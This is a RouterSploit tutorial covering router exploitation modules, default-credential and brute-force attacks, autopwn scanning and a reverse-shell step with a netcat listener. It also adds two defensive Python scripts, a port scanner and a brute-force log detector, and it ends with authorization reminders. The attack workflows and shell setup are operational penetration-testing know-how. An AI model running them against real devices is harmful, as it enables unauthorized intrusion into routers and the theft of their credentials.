# RouterSploit

## Overview

RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices, similar to Metasploit but specialized for router and embedded-device penetration testing.
## Installation

### Ubuntu/Debian

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.py
```

### macOS

```bash
brew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.py
```

### Docker

```bash
docker run -it threat9/routersploit
```

### From Source

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.py
```
## Starting the Interactive Console

```bash
python3 rsf.py
# The RouterSploit> prompt appears
```

## Basic Commands

| Command | Description |
|---|---|
| `help` | Display all available commands |
| `show modules` | List all available modules |
| `search [keyword]` | Search modules by name or description |
| `use [module]` | Load a specific module |
| `info` | Display module information and options |
| `set [option] [value]` | Configure module options |
| `back` | Exit the current module |
| `show options` | Display current module options |
| `exploit` or `run` | Execute the current module |
| `exit` | Exit RouterSploit |
## Module Types

### Exploits

Modules that trigger vulnerabilities to gain unauthorized access or control:

```
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_upload
```

### Credential Testing

Modules for testing default credentials and brute-forcing:

```
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_creds
```

### Scanners

Modules that scan for vulnerabilities without exploiting them:

```
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scanner
```

### Payloads

Modules for generating and delivering payloads:

```
use payloads/reverse_shell
use payloads/bind_shell
```
## Searching and Listing Modules

### Search by Keyword

```
search d-link
search rce
search authentication
search remote_code_execution
```

### List All Modules

```
show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scanner
```

### Get Module Details

```
use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor info
```
## Working with Exploits

### Basic Exploit Workflow

```
# 1. Search for a relevant exploit
search netgear

# 2. Load the module
use exploits/netgear/cmd_injection

# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)

# 4. Set the required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444

# 5. Execute the exploit
exploit
# or
run
```

### Setting Target Information

```
set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1    # Remote host
```

### Setting Payload Options

```
set lhost 192.168.1.100   # Listener/attacker host
set lport 4444            # Listener port
set lpass password123     # Listener password
set payload reverse_shell
```

### Viewing Exploit Requirements

```
info
# Shows which options are required vs optional
show options
```
## Credential Testing

### Default Credential Testing

```
use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploit
```

### Brute-Force Attack

```
use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploit
```

### HTTP Credential Brute-Force

```
use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploit
```

### SSH Brute-Force

```
use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploit
```
## Scanner Modules

### AutoPwn Scanner

Automatically scans for vulnerabilities and attempts exploitation:

```
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation paths
```

### Port Scanner

Identifies open ports on the target:

```
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploit
```
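The port scanner module above is, at its core, a TCP connect scan over a port specification such as `1-1000`. The following stand-alone Python script is an added example (not RouterSploit's own code, and all function names in it are hypothetical) that reproduces that behaviour so a defender can audit which management ports a device on their own network exposes. It parses the same `1-1000` / `22,80,443` syntax as `set ports`, scans concurrently with a connect timeout, and maps open ports to the management services that should normally be closed or filtered on a router's WAN side. `local_test_ports()` opens a listener on loopback so the script can be exercised offline without touching any real device.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Hypothetical helper names (not part of RouterSploit): a plain TCP connect scan
# that reproduces what `scanners/port_scanner` reports for `set ports 1-1000`.

# Ports on which router management interfaces are commonly reachable.
MANAGEMENT_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 80: "http",
                    443: "https", 8080: "http-alt"}


def parse_port_range(spec):
    """Turn '1-1000', '22,80,443' or a mix of both into a sorted list of ports."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"invalid port specification: {part!r}")
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def tcp_port_open(host, port, timeout=0.5):
    """Return True when a TCP connect() to host:port completes within `timeout`."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:              # refused, timed out, unreachable, ...
        return False


def scan_ports(host, ports, timeout=0.5, workers=32):
    """Connect-scan `ports` concurrently and return the sorted list of open ones."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda p: tcp_port_open(host, p, timeout), ports))
    return sorted(p for p, is_open in zip(ports, flags) if is_open)


def exposed_management_services(open_ports):
    """Map open ports to management services a defender would want closed or filtered."""
    return [(p, MANAGEMENT_PORTS[p]) for p in open_ports if p in MANAGEMENT_PORTS]


def local_test_ports():
    """Open one listening socket on 127.0.0.1 and reserve-then-release a second
    port, so the scanner can be exercised offline.
    Returns (listener, open_port, closed_port); close `listener` when done."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                # nothing listens on closed_port any more
    return listener, listener.getsockname()[1], closed_port


if __name__ == "__main__":
    # Offline demonstration against the loopback listener; for a real audit of a
    # device you administer, replace host and ports, e.g. parse_port_range("1-1000").
    listener, open_port, closed_port = local_test_ports()
    found = scan_ports("127.0.0.1", [open_port, closed_port])
    print("open ports:", found)
    print("exposed management services:", exposed_management_services(found))
    listener.close()
```

A connect scan completes the TCP handshake, so it shows up in the device's connection logs; that is acceptable for auditing your own equipment and is the same footprint the RouterSploit module leaves.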
### Service Detection

Identifies services and versions:

```
use scanners/service_scanner
set target 192.168.1.1
exploit
```

### Vulnerability Scanner

Scans for known vulnerabilities:

```
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploit
```
## Supported Vendors

RouterSploit includes modules for major router and embedded-device manufacturers:

| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
## Common Workflows

### Reconnaissance and Exploitation

```
# Step 1: Scan the target
use scanners/port_scanner
set target 192.168.1.1
exploit

# Step 2: Identify the device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit

# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploit
```

### Targeted Exploitation

```
# Know the target device? Search for it directly
search "TP-Link WR841N"

# Load the specific exploit
use exploits/tp-link/wr841n_rce

# Set options
set target 192.168.1.1
set lhost 192.168.1.100

# Execute
exploit
```
### Credential Harvesting

```
# Multiple credential-testing approaches
use creds/default_creds
set target 192.168.1.1
exploit

# Then brute-force the remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploit
```
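The credential modules in the Credential Testing section and in this workflow all produce the same footprint on the device: a burst of failed logins from one source against one service, sometimes followed by a successful login when a default or weak password is found. The following Python script is an added example, not part of RouterSploit or of this page's original content, showing how a defender can detect that pattern in syslog-style authentication logs. The log lines in `SAMPLE_LOG` are constructed for the example (no real device produced them), the `Failed password for <user> from <ip>` message shape is assumed for all three services, and `ASSUMED_YEAR` is an assumption because syslog timestamps carry no year.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth log in syslog style (not captured from a real device).
SAMPLE_LOG = """\
Mar 10 12:00:01 gw sshd[1201]: Failed password for root from 10.0.0.5 port 51000 ssh2
Mar 10 12:00:02 gw sshd[1201]: Failed password for root from 10.0.0.5 port 51001 ssh2
Mar 10 12:00:03 gw sshd[1201]: Failed password for admin from 10.0.0.5 port 51002 ssh2
Mar 10 12:00:04 gw sshd[1201]: Failed password for admin from 10.0.0.5 port 51003 ssh2
Mar 10 12:00:05 gw sshd[1201]: Failed password for admin from 10.0.0.5 port 51004 ssh2
Mar 10 12:00:06 gw sshd[1201]: Failed password for admin from 10.0.0.5 port 51005 ssh2
Mar 10 12:00:09 gw sshd[1201]: Accepted password for admin from 10.0.0.5 port 51006 ssh2
Mar 10 12:01:30 gw telnetd[77]: Failed password for admin from 10.0.0.9
Mar 10 12:05:30 gw telnetd[77]: Failed password for admin from 10.0.0.9
Mar 10 12:07:00 gw sshd[1201]: Failed password for backup from 10.0.0.7 port 40000 ssh2
Mar 10 12:07:05 gw sshd[1201]: Accepted password for backup from 10.0.0.7 port 40001 ssh2
Mar 10 12:07:06 gw kernel: eth0: link up
"""

# Syslog timestamps carry no year; one is assumed so events can be ordered.
ASSUMED_YEAR = 2024

# Assumed message shape shared by sshd, telnetd and the HTTP daemon in the sample.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<service>\w+)\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)


def parse_line(line):
    """Return a dict for an authentication event, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "service": m["service"], "outcome": m["outcome"].lower(),
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag (source IP, service) pairs with >= threshold failures inside a sliding
    time window, and record whether a successful login from that source followed."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # key -> failure timestamps still inside the window
    users = defaultdict(set)      # key -> usernames tried from that source
    alerts = {}                   # key -> alert dict (one per source/service pair)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["ip"], ev["service"])
        if ev["outcome"] == "failed":
            q = recent[key]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # drop failures older than the window
                q.popleft()
            users[key].add(ev["user"])
            if len(q) >= threshold:
                alert = alerts.setdefault(key, {
                    "ip": ev["ip"], "service": ev["service"], "first": q[0],
                    "users": users[key], "followed_by_success": False})
                alert["last"], alert["count"] = ev["ts"], len(q)
        elif key in alerts:
            # A login accepted after a burst means a password was guessed.
            alerts[key]["followed_by_success"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']} -> {a['service']}: {a['count']} failures between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}, users={sorted(a['users'])}, "
              f"followed_by_success={a['followed_by_success']}")
```

A threshold of five failures in sixty seconds catches the dictionary modules as configured on this page; the telnet source in the sample, with two failures four minutes apart, only trips the detector when the window is widened, which is the trade-off between catching slow, low-thread brute-forcing and generating noise from users who mistype a password.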
### Post-Exploitation Shell Access

```
# After a successful exploit, obtain a shell
# Set up a listener (in a separate terminal)
nc -lvnp 4444

# In RouterSploit, execute the reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# The shell connects back to the listener
```
## Custom Module Creation

### Module Structure

Create a custom exploit at routersploit/modules/exploits/custom/; the file's path below modules/ becomes the name passed to `use`. The skeleton below follows the layout of the project's bundled modules (`__info__` metadata, `Opt*` option descriptors, `run()` and `check()`):

```python
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """Custom router exploitation module (skeleton)."""

    # Metadata shown by `info`; RouterSploit reads it from __info__.
    __info__ = {
        "name": "Custom Router RCE",
        "description": "Custom exploitation module description",
        "authors": ("Your Name",),
        "references": ("https://example.invalid/advisory",),   # placeholder
        "devices": ("Custom Vendor Custom Model 1.0",),
    }

    # Options exposed to `show options` / `set`; the Opt* descriptors validate input.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target port")

    def run(self):
        """Called by `exploit` / `run`: exploitation logic goes here."""
        pass

    @mute
    def check(self):
        """Called by `check`: return True (vulnerable), False (not vulnerable)
        or None (could not be determined)."""
        return None
```
## RouterSploit vs Metasploit

| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
## Advanced Options

### Setting Threads for Brute-Force

```
use creds/http_bruteforce
set threads 10
# Increases the number of concurrent attempts
```

### Custom Wordlists

```
set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txt
```

### Timeout Configuration

```
set timeout 10
# Increases the response wait time for slow networks
```

### Logging Output

```
exploit > output.log
# Capture results to a file
```
## Troubleshooting

| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run `info` to verify that all required options are set |
| Slow brute-force | Increase the `threads` parameter |
| Python import errors | Reinstall dependencies: `pip install -r requirements.txt` |
## Security Considerations

- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
## Resources

- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers